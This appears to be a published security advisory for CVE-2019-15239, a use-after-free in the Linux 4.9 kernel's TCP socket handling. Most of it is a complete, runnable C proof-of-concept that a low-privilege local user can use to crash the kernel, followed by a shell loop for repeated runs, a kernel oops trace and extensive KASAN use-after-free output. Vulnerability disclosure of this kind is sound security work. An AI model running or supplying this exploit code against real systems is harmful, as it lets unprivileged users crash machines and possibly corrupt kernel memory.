Linux Kernel 4.9 - TCP Socket Handling Use-After-Free (CVE-2019-15239)

Aug 14 2019

A use-after-free condition was present in the Linux 4.9 kernel TCP socket handling code, triggerable by a low privilege local user. The included POC triggers multiple read and write UAF conditions. Additionally, the POC causes a kernel crash on a vanilla Debian build.

Date Released: 14/08/2019
Author: Denis Andzakovic
Vendor Website: https://www.debian.org/
Affected Software: Linux Kernel 4.9.168
CVE: CVE-2019-15239

Proof-of-Concept

By adding to the write queue between disconnection and reconnection, multiple use-after-free conditions can be triggered. The following POC can be used to replicate the issue. The POC may need to be run many times before the condition is reliably triggered, for example: for i in {1..1000}; do ./repro; done

#define _GNU_SOURCE

#include <endian.h>
#include <pthread.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <time.h>
#include <unistd.h>
#include <linux/futex.h>

/* Block the calling thread for roughly @ms milliseconds (thin usleep() wrapper). */
static void sleep_ms(uint64_t ms)
{
  const uint64_t micros = ms * 1000;
  usleep(micros);
}

/*
 * Monotonic wall-clock reading in milliseconds (CLOCK_MONOTONIC, so unaffected by
 * wall-clock adjustments). A failing clock_gettime() aborts the process with exit(1),
 * matching the error policy of the rest of the harness.
 */
static uint64_t current_time_ms(void)
{
  struct timespec now;
  if (clock_gettime(CLOCK_MONOTONIC, &now) != 0)
    exit(1);
  const uint64_t sec_part = (uint64_t)now.tv_sec * 1000u;
  const uint64_t nsec_part = (uint64_t)now.tv_nsec / 1000000u;
  return sec_part + nsec_part;
}

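/*
 * Start a worker thread running fn(arg) on a 128 KiB stack.
 * The pthread_t handle is never handed back to the caller, so the thread is
 * created detached instead of being left joinable-but-never-joined. Every
 * pthread call is checked; any failure aborts the process with exit(1),
 * the same policy the original used for pthread_create() only.
 */
static void thread_start(void* (*fn)(void*), void* arg)
{
  pthread_t th;
  pthread_attr_t attr;
  if (pthread_attr_init(&attr))
    exit(1);
  if (pthread_attr_setstacksize(&attr, 128 << 10) ||
      pthread_attr_setdetachstate(&attr, PTHREAD_CREATE_DETACHED) ||
      pthread_create(&th, &attr, fn, arg))
    exit(1);
  pthread_attr_destroy(&attr);
}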

/*
 * One-shot signal between two threads. state is 0 (clear) or 1 (set); it is
 * written with atomic builtins and waiters park on its address with futex()
 * (see event_set()/event_wait()/event_timedwait()).
 */
typedef struct {
  int state;
} event_t;

/* Put a freshly declared event into the clear state. Not safe to race with a waiter. */
static void event_init(event_t* ev)
{
  *ev = (event_t){ .state = 0 };
}

/* Clear a previously set event so it can be set again (plain store, like event_init()). */
static void event_reset(event_t* ev)
{
  memset(ev, 0, sizeof *ev);
}

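/*
 * Set the event and wake anyone blocked in event_wait()/event_timedwait().
 * Setting an already-set event is a harness bug and aborts with exit(1).
 *
 * Fix: FUTEX_WAKE takes a "val" argument (the number of waiters to wake).
 * The original call passed none, so the kernel read whatever happened to be
 * in the third argument register; if that was 0 a waiter already parked in
 * FUTEX_WAIT would never be woken. Pass an explicit count that wakes all.
 */
static void event_set(event_t* ev)
{
  if (ev->state)
    exit(1);
  __atomic_store_n(&ev->state, 1, __ATOMIC_RELEASE);
  syscall(SYS_futex, &ev->state, FUTEX_WAKE | FUTEX_PRIVATE_FLAG, INT32_MAX);
}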

/*
 * Block until the event is set. FUTEX_WAIT returns immediately if state is
 * already non-zero (the compare value is 0), so the loop re-checks after each
 * wake-up, including spurious ones.
 */
static void event_wait(event_t* ev)
{
  for (;;) {
    if (__atomic_load_n(&ev->state, __ATOMIC_ACQUIRE))
      break;
    syscall(SYS_futex, &ev->state, FUTEX_WAIT | FUTEX_PRIVATE_FLAG, 0, 0);
  }
}

/* Non-blocking probe: returns the current state (non-zero when set). */
static int event_isset(event_t* ev)
{
  const int current = __atomic_load_n(&ev->state, __ATOMIC_ACQUIRE);
  return current;
}

/*
 * Wait for the event for at most @timeout milliseconds.
 * Returns 1 as soon as the event is observed set, 0 once more than @timeout ms
 * have elapsed without it. Each FUTEX_WAIT gets the remaining budget as a
 * relative timeout; the loop re-arms after spurious wake-ups.
 */
static int event_timedwait(event_t* ev, uint64_t timeout)
{
  const uint64_t t0 = current_time_ms();
  uint64_t elapsed = 0;
  do {
    const uint64_t left = timeout - elapsed;
    struct timespec ts = {
      .tv_sec = (time_t)(left / 1000),
      .tv_nsec = (long)((left % 1000) * 1000 * 1000),
    };
    syscall(SYS_futex, &ev->state, FUTEX_WAIT | FUTEX_PRIVATE_FLAG, 0, &ts);
    if (__atomic_load_n(&ev->state, __ATOMIC_RELAXED))
      return 1;
    elapsed = current_time_ms() - t0;
  } while (elapsed <= timeout);
  return 0;
}

/* Per-worker state; one entry per slot of threads[]. */
struct thread_t {
  int created, call;   /* created: worker thread started; call: index handed to execute_call() */
  event_t ready, done; /* ready: work is queued for the worker; done: worker idle / finished */
};

static struct thread_t threads[16];  /* worker pool; bounds how many calls can be in flight at once */
static void execute_call(int call);  /* defined below without "static"; this declaration fixes internal linkage */
static int running;                  /* number of calls currently executing; updated with atomic add/sub */

/*
 * Worker thread body. Waits for loop() to hand over a call index via @ready,
 * runs it, decrements the global in-flight counter and signals @done.
 * Never returns on its own; the trailing return only satisfies the pthread
 * start-routine signature.
 */
static void* thr(void* arg)
{
  struct thread_t* self = arg;
  while (1) {
    event_wait(&self->ready);
    event_reset(&self->ready);
    execute_call(self->call);
    __atomic_fetch_sub(&running, 1, __ATOMIC_RELAXED);
    event_set(&self->done);
  }
  return 0;
}

/*
 * Dispatch calls 0..7 in order, each to the first idle worker.
 * A worker is created lazily on first use and starts out marked done. After
 * handing a call over, wait at most 45 ms for it; a call that blocks longer
 * stays on its worker and the next call is given to another idle worker.
 * Finally give in-flight calls up to ~100 ms to drain before returning.
 */
static void loop(void)
{
  const int nworkers = (int)(sizeof(threads) / sizeof(threads[0]));
  for (int call = 0; call < 8; call++) {
    for (int idx = 0; idx < nworkers; idx++) {
      struct thread_t* worker = &threads[idx];
      if (!worker->created) {
        worker->created = 1;
        event_init(&worker->ready);
        event_init(&worker->done);
        event_set(&worker->done);
        thread_start(thr, worker);
      }
      if (!event_isset(&worker->done))
        continue;
      event_reset(&worker->done);
      worker->call = call;
      __atomic_fetch_add(&running, 1, __ATOMIC_RELAXED);
      event_set(&worker->ready);
      event_timedwait(&worker->done, 45);
      break;
    }
  }
  for (int i = 0; i < 100; i++) {
    if (!__atomic_load_n(&running, __ATOMIC_RELAXED))
      break;
    sleep_ms(1);
  }
}

/*
 * Descriptors produced by earlier calls and consumed by later ones:
 * r[0] from socket() (case 0), r[1] from dup2() (case 3). Initialised to
 * all-ones, i.e. -1 as a signed fd, so an unset slot is an invalid descriptor.
 */
uint64_t r[2] = {0xffffffffffffffff, 0xffffffffffffffff};

/*
 * Run one step of the reproducer (syzkaller-generated style).
 * Each case issues a single syscall on the descriptors in r[]; arguments are
 * assembled by storing raw fields into the fixed scratch mapping that main()
 * creates at 0x20000000, so the field offsets are those of the x86-64 ABI
 * structures. Return values are discarded except where they yield a
 * descriptor (cases 0 and 3). There is no default: an unknown call index is
 * silently ignored.
 */
void execute_call(int call)
{
  long res;

  switch (call) {
  case 0:
    /* socket(2, 1, 0): domain 2 / type 1 are AF_INET / SOCK_STREAM on Linux. */
    res = socket(2, 1, 0);
    if (res != -1)
      r[0] = res;
    break;
  case 1:
    /* sockaddr_in at 0x20000000: family 2, port 0x4e23, addr 0xe0000001 (224.0.0.1). */
    *(uint16_t*)0x20000000 = 2;
    *(uint16_t*)0x20000002 = htobe16(0x4e23);
    *(uint32_t*)0x20000004 = htobe32(0xe0000001);
    bind(r[0], (void *)0x20000000, 0x10); /* 0x10 == sizeof(struct sockaddr_in) */
    break;
  case 2:
    /*
     * sockaddr_in at 0x20000200: family 2, port 0x4e23, addr 0 (INADDR_ANY).
     * addrlen 0x1c is larger than the 16 bytes written; the trailing bytes
     * are whatever the anonymous mapping holds (zero unless written before).
     */
    *(uint16_t*)0x20000200 = 2;
    *(uint16_t*)0x20000202 = htobe16(0x4e23);
    *(uint32_t*)0x20000204 = htobe32(0);
    connect(r[0], (void *)0x20000200, 0x1c);
    break;
  case 3:
    /* dup2() with equal descriptors returns the descriptor itself, so r[1] aliases r[0]. */
    res = dup2(r[0], r[0]);
    if (res != -1)
      r[1] = res;
    break;
  case 4:
    /*
     * 24-byte buffer at 0x200002c0, then write() with a length (0xfffffc1a)
     * far beyond the 16 MiB mapping. How much of it the kernel accepts before
     * faulting on unmapped memory is not determined here; the advisory text
     * describes this step as adding data to the write queue.
     */
    *(uint32_t*)0x200002c0 = 0x18;
    *(uint32_t*)0x200002c4 = 0;
    *(uint64_t*)0x200002c8 = 2;
    *(uint32_t*)0x200002d0 = 0;
    *(uint32_t*)0x200002d4 = 0;
    write(r[1], (void *)0x200002c0, 0xfffffc1a);
    break;
  case 5:
    /*
     * struct msghdr at 0x20005840 (x86-64 offsets): msg_name = 0, msg_namelen = 0,
     * msg_iov = 0x20005780, msg_iovlen = 7, msg_control = 0, msg_controllen = 0,
     * msg_flags = 0x40000. The iovec array holds one 0x18-byte entry at
     * 0x20000480 followed by six zero-length entries.
     */
    *(uint64_t*)0x20005840 = 0;
    *(uint32_t*)0x20005848 = 0;
    *(uint64_t*)0x20005850 = 0x20005780;
    *(uint64_t*)0x20005780 = 0x20000480;
    /*
     * The payload looks like a netlink message (nlmsghdr plus one attribute),
     * presumably a leftover of fuzzing; on this stream socket it is opaque bytes.
     */
    *(uint32_t*)0x20000480 = 0x18;
    *(uint16_t*)0x20000484 = 0xfff9;
    *(uint16_t*)0x20000486 = 0x300;
    *(uint32_t*)0x20000488 = 0x70bd27;
    *(uint32_t*)0x2000048c = 0x25dfdbfc;
    *(uint16_t*)0x20000490 = 8;
    *(uint16_t*)0x20000492 = 0x72;
    *(uint32_t*)0x20000494 = 0;
    *(uint64_t*)0x20005788 = 0x18;
    *(uint64_t*)0x20005790 = 0;
    *(uint64_t*)0x20005798 = 0;
    *(uint64_t*)0x200057a0 = 0;
    *(uint64_t*)0x200057a8 = 0;
    *(uint64_t*)0x200057b0 = 0;
    *(uint64_t*)0x200057b8 = 0;
    *(uint64_t*)0x200057c0 = 0;
    *(uint64_t*)0x200057c8 = 0;
    *(uint64_t*)0x200057d0 = 0;
    *(uint64_t*)0x200057d8 = 0;
    *(uint64_t*)0x200057e0 = 0;
    *(uint64_t*)0x200057e8 = 0;
    *(uint64_t*)0x20005858 = 7;
    *(uint64_t*)0x20005860 = 0;
    *(uint64_t*)0x20005868 = 0;
    *(uint32_t*)0x20005870 = 0x40000;
    sendmsg(r[1], (void *)0x20005840, 1); /* flags 1 == MSG_OOB */
    break;
  case 6:
    /*
     * sockaddr at 0x20000180 with family 0 (AF_UNSPEC) and addrlen 8; the
     * "./file0" bytes after the family field are never interpreted as a path.
     * connect(2) documents that TCP sockets dissolve their association when
     * connected to AF_UNSPEC - this is the "disconnection" step the advisory
     * refers to (NOTE(review): inferred from the man page, confirm).
     */
    *(uint16_t*)0x20000180 = 0;
    memcpy(
        (void*)0x20000182,
        "./"
        "file0\x00",
        6);
    connect(r[1], (void *)0x20000180, 0x8);
    break;
  case 7:
    /* Reconnect: sockaddr_in at 0x20000140, family 2, port 0x4e23, addr 127.0.0.1. */
    *(uint16_t*)0x20000140 = 2;
    *(uint16_t*)0x20000142 = htobe16(0x4e23);
    *(uint32_t*)0x20000144 = htobe32(0x7f000001);
    connect(r[0], (void *)0x20000140, 0x10);
    break;
  }
}
/*
 * Entry point. Creates the fixed scratch region execute_call() stores into
 * (16 MiB at 0x20000000; prot 3 == PROT_READ|PROT_WRITE, flags 0x32 ==
 * MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS), prints the pid so the process can be
 * matched against kernel log output, then runs the dispatch loop.
 * The mmap result is not checked, as in the original harness.
 */
int main(void)
{
  const unsigned long scratch_base = 0x20000000ul;
  const unsigned long scratch_size = 0x1000000ul;
  syscall(__NR_mmap, scratch_base, scratch_size, 3, 0x32, -1, 0);
  const pid_t pid = getpid();
  printf("My process ID : %d\n", (int)pid);
  loop();
  return 0;
}

A successful run of the POC above produces the following kernel crash:

[   65.706537] BUG: unable to handle kernel NULL pointer dereference at 0000000000000008
[   65.707195] IP: [<ffffffff815702c1>] tcp_fragment+0x261/0x340
[   65.707804] PGD 0

[   65.708434] Oops: 0002 [#1] SMP
[   65.709079] Modules linked in: iptable_filter fuse crct10dif_pclmul crc32_pclmul vmw_balloon ghash_clmulni_intel joydev serio_raw pcspkr vmw_vmci snd_ens1371 snd_ac97_codec ac97_bus gameport snd_rawmidi snd_seq_device snd_pcm snd_timer snd soundcore shpchp evdev vmwgfx ttm drm_kms_helper drm sg ac button btusb btrtl btbcm btintel bluetooth rfkill ip_tables x_tables autofs4 ext4 crc16 jbd2 crc32c_generic fscrypto ecb mbcache sr_mod cdrom sd_mod ata_generic hid_generic usbhid hid crc32c_intel aesni_intel aes_x86_64 glue_helper lrw gf128mul ablk_helper cryptd psmouse ata_piix ehci_pci e1000 uhci_hcd ehci_hcd usbcore usb_common mptspi scsi_transport_spi mptscsih mptbase i2c_piix4 libata scsi_mod
[   65.714663] CPU: 0 PID: 612 Comm: repro Not tainted 4.9.0-9-amd64 #1 Debian 4.9.168-1
[   65.715408] Hardware name: VMware, Inc. VMware Virtual Platform/440BX Desktop Reference Platform, BIOS 6.00 05/19/2017
[   65.716911] task: ffff880016bc90c0 task.stack: ffffc90000974000
[   65.717645] RIP: 0010:[<ffffffff815702c1>]  [<ffffffff815702c1>] tcp_fragment+0x261/0x340
[   65.718405] RSP: 0018:ffffc90000977b68  EFLAGS: 00010286
[   65.719996] RAX: 0000000000000000 RBX: ffff8800197ec600 RCX: 0000000000000001
[   65.722660] RDX: 0000000000000000 RSI: 0000000000000001 RDI: 0000000000000000
[   65.727010] RBP: ffff8800197ec800 R08: 000000000000ffd7 R09: 0000000000000002
[   65.727756] R10: 0000000000000002 R11: 0000000000000000 R12: 0000000000000000
[   65.728507] R13: ffff880013771040 R14: 0000000000007fff R15: 0000000000007fff
[   65.729243] FS:  0000000000000000(0000) GS:ffff88001ba00000(0000) knlGS:0000000000000000
[   65.729939] CS:  0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[   65.730554] CR2: 0000000000000008 CR3: 0000000001c08000 CR4: 0000000000360670
[   65.731224] Stack:
[   65.731852]  0000000000000000 0000000000007fff ffff8800197ec600 0000000000000001
[   65.732469]  0000000000000000 ffff880013771040 ffffffff81571a66 ffff880013771170
[   65.733098]  0000000002080020 0000000000000002 00007ffe00000001 0000000000000000
[   65.733719] Call Trace:
[   65.734351]  [<ffffffff81571a66>] ? tcp_write_xmit+0x676/0xfc0
[   65.734967]  [<ffffffff815723dd>] ? __tcp_push_pending_frames+0x2d/0xd0
[   65.735526]  [<ffffffff81564bae>] ? tcp_close+0x3fe/0x450
[   65.736093]  [<ffffffff8158e58c>] ? inet_release+0x3c/0x60
[   65.736637]  [<ffffffff814f2800>] ? sock_release+0x20/0x80
[   65.737208]  [<ffffffff814f286e>] ? sock_close+0xe/0x20
[   65.737741]  [<ffffffff8120dc48>] ? __fput+0xd8/0x220
[   65.738280]  [<ffffffff81098d5f>] ? task_work_run+0x7f/0xa0
[   65.738847]  [<ffffffff8107ed64>] ? do_exit+0x2d4/0xb60
[   65.739403]  [<ffffffff814f8003>] ? release_sock+0x43/0x90
[   65.739994]  [<ffffffff8156408f>] ? tcp_sendmsg+0x65f/0xc40
[   65.740504]  [<ffffffff8107f66a>] ? do_group_exit+0x3a/0xa0
[   65.741131]  [<ffffffff8108a5fc>] ? get_signal+0x15c/0x7f0
[   65.741676]  [<ffffffff8161a964>] ? __switch_to_asm+0x34/0x70
[   65.742209]  [<ffffffff8161a970>] ? __switch_to_asm+0x40/0x70
[   65.742652]  [<ffffffff8161a970>] ? __switch_to_asm+0x40/0x70
[   65.743265]  [<ffffffff8161a964>] ? __switch_to_asm+0x34/0x70
[   65.743726]  [<ffffffff81026456>] ? do_signal+0x36/0x6a0
[   65.744135]  [<ffffffff8161a970>] ? __switch_to_asm+0x40/0x70
[   65.744520]  [<ffffffff8161a964>] ? __switch_to_asm+0x34/0x70
[   65.744952]  [<ffffffff8161a970>] ? __switch_to_asm+0x40/0x70
[   65.745336]  [<ffffffff8161a964>] ? __switch_to_asm+0x34/0x70
[   65.745666]  [<ffffffff8102568f>] ? __switch_to+0x1ef/0x660
[   65.746061]  [<ffffffff8161a964>] ? __switch_to_asm+0x34/0x70
[   65.746367]  [<ffffffff8161a970>] ? __switch_to_asm+0x40/0x70
[   65.746683]  [<ffffffff81615aa1>] ? __schedule+0x241/0x6f0
[   65.747035]  [<ffffffff8120bb74>] ? vfs_write+0x144/0x190
[   65.747349]  [<ffffffff81003721>] ? exit_to_usermode_loop+0x71/0xb0
[   65.747654]  [<ffffffff81003bcd>] ? do_syscall_64+0xdd/0xf0
[   65.748012]  [<ffffffff8161a84e>] ? entry_SYSCALL_64_after_swapgs+0x58/0xc6
[   65.748310] Code: 00 00 8b 85 cc 00 00 00 80 8d 8e 00 00 00 02 48 03 85 d0 00 00 00 c7 40 20 01 00 01 00 48 8b 03 48 89 5d 08 48 89 45 00 48 89 2b <48> 89 68 08 41 83 85 40 01 00 00 01 31 c0 5b 5d 41 5c 41 5d 41
[   65.749362] RIP  [<ffffffff815702c1>] tcp_fragment+0x261/0x340
[   65.749672]  RSP <ffffc90000977b68>
[   65.750076] CR2: 0000000000000008
[   65.750374] ---[ end trace 7d15bf5730d84780 ]---
[   65.750670] Fixing recursive fault but reboot is needed!

Additionally, the POC produced the following KASAN output. Note that all of the following lines stem from a single successful execution of the POC.

BUG: KASAN: use-after-free in ip_queue_xmit+0x50b/0x750 at addr ffff8801eb449b40 - Write of size 8 by task rep/29723
--
BUG: KASAN: use-after-free in skb_push+0x1b/0x80 at addr ffff8801eb449bc0 - Read of size 8 by task rep/29723
--
BUG: KASAN: use-after-free in skb_push+0x3b/0x80 at addr ffff8801eb449b68 - Read of size 4 by task rep/29723
--
BUG: KASAN: use-after-free in skb_push+0x4e/0x80 at addr ffff8801eb449bb8 - Read of size 8 by task rep/29723
--
BUG: KASAN: use-after-free in ip_queue_xmit+0x9f/0x750 at addr ffff8801eb449bc0 - Read of size 8 by task rep/29723
--
BUG: KASAN: use-after-free in ip_queue_xmit+0xba/0x750 at addr ffff8801eb449bb8 - Read of size 8 by task rep/29723
--
BUG: KASAN: use-after-free in ip_queue_xmit+0xdd/0x750 at addr ffff8801eb449bac - Write of size 2 by task rep/29723
--
BUG: KASAN: use-after-free in ip_queue_xmit+0x118/0x750 at addr ffff8801f46be37c - Write of size 2 by task rep/29723
--
BUG: KASAN: use-after-free in ip_queue_xmit+0x3e6/0x750 at addr ffff8801eb449b78 - Read of size 1 by task rep/29723
--
BUG: KASAN: use-after-free in ip_queue_xmit+0x3fd/0x750 at addr ffff8801f46be382 - Write of size 2 by task rep/29723
--
BUG: KASAN: use-after-free in ip_queue_xmit+0x180/0x750 at addr ffff8801f46be384 - Write of size 1 by task rep/29723
--
BUG: KASAN: use-after-free in ip_queue_xmit+0x1aa/0x750 at addr ffff8801f46be385 - Write of size 1 by task rep/29723
--
BUG: KASAN: use-after-free in ip_queue_xmit+0x1da/0x750 at addr ffff8801f46be388 - Write of size 8 by task rep/29723
--
BUG: KASAN: use-after-free in ip_queue_xmit+0x20b/0x750 at addr ffff8801eb449bb4 - Read of size 4 by task rep/29723
--
BUG: KASAN: use-after-free in ip_queue_xmit+0x21c/0x750 at addr ffff8801eb449bb8 - Read of size 8 by task rep/29723
--
BUG: KASAN: use-after-free in ip_queue_xmit+0x22f/0x750 at addr ffff8801f46be944 - Read of size 2 by task rep/29723
--
BUG: KASAN: use-after-free in ip_queue_xmit+0x24a/0x750 at addr ffff8801eb449bac - Read of size 2 by task rep/29723
--
BUG: KASAN: use-after-free in ip_queue_xmit+0x25e/0x750 at addr ffff8801f46be382 - Read of size 2 by task rep/29723
--
BUG: KASAN: use-after-free in ip_queue_xmit+0x272/0x750 at addr ffff8801eb449b78 - Read of size 1 by task rep/29723
--
BUG: KASAN: use-after-free in ip_queue_xmit+0x2b5/0x750 at addr ffff8801f46be380 - Write of size 2 by task rep/29723
--
BUG: KASAN: use-after-free in ip_queue_xmit+0x2f8/0x750 at addr ffff8801eb449b84 - Write of size 4 by task rep/29723
--
BUG: KASAN: use-after-free in ip_queue_xmit+0x31e/0x750 at addr ffff8801eb449b9c - Write of size 4 by task rep/29723
--
BUG: KASAN: use-after-free in __ip_local_out+0x79/0x270 at addr ffff8801eb449bac - Read of size 2 by task rep/29723
--
BUG: KASAN: use-after-free in __ip_local_out+0x8d/0x270 at addr ffff8801eb449bb8 - Read of size 8 by task rep/29723
--
BUG: KASAN: use-after-free in __ip_local_out+0xa0/0x270 at addr ffff8801eb449b68 - Read of size 4 by task rep/29723
--
BUG: KASAN: use-after-free in __ip_local_out+0xb2/0x270 at addr ffff8801f46be37e - Write of size 2 by task rep/29723
--
BUG: KASAN: use-after-free in ip_send_check+0x12/0x60 at addr ffff8801f46be386 - Write of size 2 by task rep/29723
--
BUG: KASAN: use-after-free in ip_send_check+0x20/0x60 at addr ffff8801f46be37c - Read of size 1 by task rep/29723
--
BUG: KASAN: use-after-free in __ip_local_out+0xce/0x270 at addr ffff8801eb449b40 - Read of size 8 by task rep/29723
--
BUG: KASAN: use-after-free in __ip_local_out+0x116/0x270 at addr ffff8801eb449ba8 - Write of size 2 by task rep/29723
--
BUG: KASAN: use-after-free in ip_local_out+0x27/0x60 at addr ffff8801eb449b40 - Read of size 8 by task rep/29723
--
BUG: KASAN: use-after-free in ip_output+0x76/0x1c0 at addr ffff8801eb449b40 - Read of size 8 by task rep/29723
--
BUG: KASAN: use-after-free in ip_output+0xb2/0x1c0 at addr ffff8801eb449b68 - Read of size 4 by task rep/29723
--
BUG: KASAN: use-after-free in ip_output+0xc7/0x1c0 at addr ffff8801eb449b08 - Write of size 8 by task rep/29723
--
BUG: KASAN: use-after-free in ip_output+0xd7/0x1c0 at addr ffff8801eb449ba8 - Write of size 2 by task rep/29723
--
BUG: KASAN: use-after-free in ip_output+0xec/0x1c0 at addr ffff8801eb449b24 - Read of size 2 by task rep/29723
--
BUG: KASAN: use-after-free in ip_finish_output+0x25/0x310 at addr ffff8801eb449b40 - Read of size 8 by task rep/29723
--
BUG: KASAN: use-after-free in ip_finish_output+0x206/0x310 at addr ffff8801eb449b24 - Read of size 2 by task rep/29723
--
BUG: KASAN: use-after-free in ip_finish_output+0xf7/0x310 at addr ffff8801eb449bb4 - Read of size 4 by task rep/29723
--
BUG: KASAN: use-after-free in ip_finish_output+0x109/0x310 at addr ffff8801eb449bb8 - Read of size 8 by task rep/29723
--
BUG: KASAN: use-after-free in ip_finish_output+0x119/0x310 at addr ffff8801f46be942 - Read of size 2 by task rep/29723
--
BUG: KASAN: use-after-free in ip_finish_output+0x130/0x310 at addr ffff8801eb449b68 - Read of size 4 by task rep/29723
--
BUG: KASAN: use-after-free in ip_fragment.constprop.54+0x25/0xf0 at addr ffff8801eb449bac - Read of size 2 by task rep/29723
--
BUG: KASAN: use-after-free in ip_fragment.constprop.54+0x38/0xf0 at addr ffff8801eb449bb8 - Read of size 8 by task rep/29723
--
BUG: KASAN: use-after-free in ip_fragment.constprop.54+0x48/0xf0 at addr ffff8801f46be382 - Read of size 2 by task rep/29723
--
BUG: KASAN: use-after-free in ip_fragment.constprop.54+0x5a/0xf0 at addr ffff8801eb449b78 - Read of size 1 by task rep/29723
--
BUG: KASAN: use-after-free in __icmp_send+0xaa/0x7c0 at addr ffff8801eb449b40 - Read of size 8 by task rep/29723
--
BUG: KASAN: use-after-free in __icmp_send+0xd7/0x7c0 at addr ffff8801eb449bac - Read of size 2 by task rep/29723
--
BUG: KASAN: use-after-free in __icmp_send+0xf3/0x7c0 at addr ffff8801eb449bb8 - Read of size 8 by task rep/29723
--
BUG: KASAN: use-after-free in __icmp_send+0x117/0x7c0 at addr ffff8801eb449bb0 - Read of size 4 by task rep/29723
--
BUG: KASAN: use-after-free in __icmp_send+0x13b/0x7c0 at addr ffff8801eb449b78 - Read of size 1 by task rep/29723
--
BUG: KASAN: use-after-free in __icmp_send+0x173/0x7c0 at addr ffff8801f46be382 - Read of size 2 by task rep/29723
--
BUG: KASAN: use-after-free in __icmp_send+0x1d9/0x7c0 at addr ffff8801f46be385 - Read of size 1 by task rep/29723
--
BUG: KASAN: use-after-free in __icmp_send+0x6b4/0x7c0 at addr ffff8801f46be38c - Read of size 4 by task rep/29723
--
BUG: KASAN: use-after-free in __icmp_send+0x360/0x7c0 at addr ffff8801f46be37d - Read of size 1 by task rep/29723
--
BUG: KASAN: use-after-free in __ip_options_echo+0x33/0x670 at addr ffff8801eb449b1c - Read of size 1 by task rep/29723
--
BUG: KASAN: use-after-free in __icmp_send+0x573/0x7c0 at addr ffff8801eb449bac - Read of size 2 by task rep/29723
--
BUG: KASAN: use-after-free in __icmp_send+0x585/0x7c0 at addr ffff8801eb449bb8 - Read of size 8 by task rep/29723
--
BUG: KASAN: use-after-free in __icmp_send+0x598/0x7c0 at addr ffff8801eb449bc0 - Read of size 8 by task rep/29723
--
BUG: KASAN: use-after-free in __icmp_send+0x5f1/0x7c0 at addr ffff8801f46be388 - Read of size 4 by task rep/29723
--
BUG: KASAN: use-after-free in icmp_route_lookup+0x2cb/0x5a0 at addr ffff8801f46be388 - Read of size 4 by task rep/29723
--
BUG: KASAN: use-after-free in icmp_route_lookup+0x14d/0x5a0 at addr ffff8801eb449b40 - Read of size 8 by task rep/29723
--
BUG: KASAN: use-after-free in icmp_route_lookup+0x18e/0x5a0 at addr ffff8801eb449bac - Read of size 2 by task rep/29723
--
BUG: KASAN: use-after-free in icmp_route_lookup+0x1a4/0x5a0 at addr ffff8801eb449bb8 - Read of size 8 by task rep/29723
--
BUG: KASAN: use-after-free in icmp_route_lookup+0x1bc/0x5a0 at addr ffff8801f46be388 - Read of size 4 by task rep/29723
--
BUG: KASAN: use-after-free in icmp_route_lookup+0x1cc/0x5a0 at addr ffff8801f46be38c - Read of size 4 by task rep/29723
--
BUG: KASAN: use-after-free in _decode_session4+0x28/0x7b0 at addr ffff8801eb449bac - Read of size 2 by task rep/29723
--
BUG: KASAN: use-after-free in _decode_session4+0x3e/0x7b0 at addr ffff8801eb449bb8 - Read of size 8 by task rep/29723
--
BUG: KASAN: use-after-free in _decode_session4+0x52/0x7b0 at addr ffff8801f46be37c - Read of size 1 by task rep/29723
--
BUG: KASAN: use-after-free in _decode_session4+0x67/0x7b0 at addr ffff8801eb449b40 - Read of size 8 by task rep/29723
--
BUG: KASAN: use-after-free in _decode_session4+0xc5/0x7b0 at addr ffff8801eb449b9c - Read of size 4 by task rep/29723
--
BUG: KASAN: use-after-free in _decode_session4+0xf5/0x7b0 at addr ffff8801eb449b88 - Read of size 4 by task rep/29723
--
BUG: KASAN: use-after-free in _decode_session4+0x116/0x7b0 at addr ffff8801f46be382 - Read of size 2 by task rep/29723
--
BUG: KASAN: use-after-free in _decode_session4+0x13a/0x7b0 at addr ffff8801f46be385 - Read of size 1 by task rep/29723
--
BUG: KASAN: use-after-free in _decode_session4+0x4c1/0x7b0 at addr ffff8801eb449bc0 - Read of size 8 by task rep/29723
--
BUG: KASAN: use-after-free in _decode_session4+0x684/0x7b0 at addr ffff8801eb449b68 - Read of size 4 by task rep/29723
--
BUG: KASAN: use-after-free in _decode_session4+0x699/0x7b0 at addr ffff8801eb449b6c - Read of size 4 by task rep/29723
--
BUG: KASAN: use-after-free in _decode_session4+0x502/0x7b0 at addr ffff8801f46be392 - Read of size 2 by task rep/29723
--
BUG: KASAN: use-after-free in _decode_session4+0x523/0x7b0 at addr ffff8801f46be390 - Read of size 2 by task rep/29723
--
BUG: KASAN: use-after-free in _decode_session4+0x1ed/0x7b0 at addr ffff8801f46be388 - Read of size 4 by task rep/29723
--
BUG: KASAN: use-after-free in _decode_session4+0x207/0x7b0 at addr ffff8801f46be38c - Read of size 4 by task rep/29723
--
BUG: KASAN: use-after-free in _decode_session4+0x288/0x7b0 at addr ffff8801f46be37d - Read of size 1 by task rep/29723
--
BUG: KASAN: use-after-free in icmp_route_lookup+0x35a/0x5a0 at addr ffff8801eb449b40 - Read of size 8 by task rep/29723
--
BUG: KASAN: use-after-free in __icmp_send+0x738/0x7c0 at addr ffff8801eb449b68 - Read of size 4 by task rep/29723
--
BUG: KASAN: use-after-free in skb_copy_and_csum_bits+0x2d/0x400 at addr ffff8801eb449b68 - Read of size 4 by task rep/29723
--
BUG: KASAN: use-after-free in skb_copy_and_csum_bits+0x40/0x400 at addr ffff8801eb449b6c - Read of size 4 by task rep/29723
--
BUG: KASAN: use-after-free in skb_copy_and_csum_bits+0x6e/0x400 at addr ffff8801eb449bc0 - Read of size 8 by task rep/29723
--
BUG: KASAN: use-after-free in nf_ct_attach+0x16/0x40 at addr ffff8801eb449b58 - Read of size 8 by task rep/29723
--
BUG: KASAN: use-after-free in kfree_skb+0x23/0xd0 at addr ffff8801eb449bcc - Read of size 4 by task rep/29723
--
BUG: KASAN: use-after-free in skb_release_head_state+0x16/0xf0 at addr ffff8801eb449b40 - Read of size 8 by task rep/29723
--
BUG: KASAN: use-after-free in skb_release_head_state+0x31/0xf0 at addr ffff8801eb449b40 - Write of size 8 by task rep/29723
--
BUG: KASAN: use-after-free in skb_release_head_state+0x42/0xf0 at addr ffff8801eb449b50 - Read of size 8 by task rep/29723
--
BUG: KASAN: use-after-free in skb_release_head_state+0x61/0xf0 at addr ffff8801eb449b48 - Read of size 8 by task rep/29723
--
